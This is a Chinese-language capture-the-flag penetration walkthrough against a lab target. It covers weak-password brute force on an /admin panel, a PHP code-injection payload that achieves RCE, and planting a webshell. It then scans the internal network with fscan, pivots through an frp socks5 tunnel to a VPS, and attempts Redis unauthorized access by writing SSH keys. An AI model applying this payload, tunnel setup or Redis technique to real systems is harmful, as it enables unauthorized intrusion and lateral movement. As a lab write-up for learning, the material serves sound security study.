文章目录
- 题目
- 一、渗透开始
- 后台执行rce漏洞
- 内网横向
题目

一、渗透开始

上burp后没有报漏洞:

/admin存在后台:

爆破一下:
admin
admin123


后台执行rce漏洞
POC:
1111111111";}<?php phpinfo()?>

触发漏洞:


可以看到禁用了很多函数:但是没有禁用关键函数

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
先写一个代码执行的php:这里可能触发了内部的waf

写入shell:

注意这里不能直接连接,我们需要找到路径才行

扫一下目录:

找了半天在:http://106.15.50.112:8021/config/tag/category_27.php

拿到shell:


第一部分:flag{fc64319e5227aa1d
拿第二部分:

上传个fscan:


直接扫网段:


感觉不对劲有点多看网段是20段:重新运行一下:
应该是192.168.112.3这台

这个112.1应该是内网的靶场就不去动他了:直接看
这个应该是redis的未授权访问

内网横向
搭建frp内网穿透,简单来说将我们已经拿到权限这台Linux流量发送到公网的vps上,我们使用代理工具连接就能访问Linux的内网了。
frp工具地址:https://github.com/fatedier/frp

配置frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 7000
./frps -c frps.ini

[common]
server_addr = xx.xx.xx.xx #/PS
server_port = 7000 #与/PS服务器开放端口一致
[http_proxy]
type = tcp #类型
remote_port = 7777 #通过socks5连接到/PS服务器端口进行数据传输
plugin = socks5



这里已经可以访问内网了:

kali怎么连接:kali直接用代理


在kali中需要proxychains4加上命令才能使用代理:
使用msf的redis未授权:
proxychains4 msfconsole
这里使用命令执行模块:info命令执行成功

这里不能使用反弹shell方式,因为有可能192.168.112.3只有内网无外网环境:这里只能使用写入私钥方式
kali生成私钥


这里失败了
msf查看也是写入了但是连不起:

等后面靶场重置,总体思路是这样的但是有点小问题,这个redis拿shell其实挺麻烦的,之前打靶场时也遇到过写入任务计划但没成功,我重置多次后成功了,这个运行不太好,也可能是frp的配置有问题。



















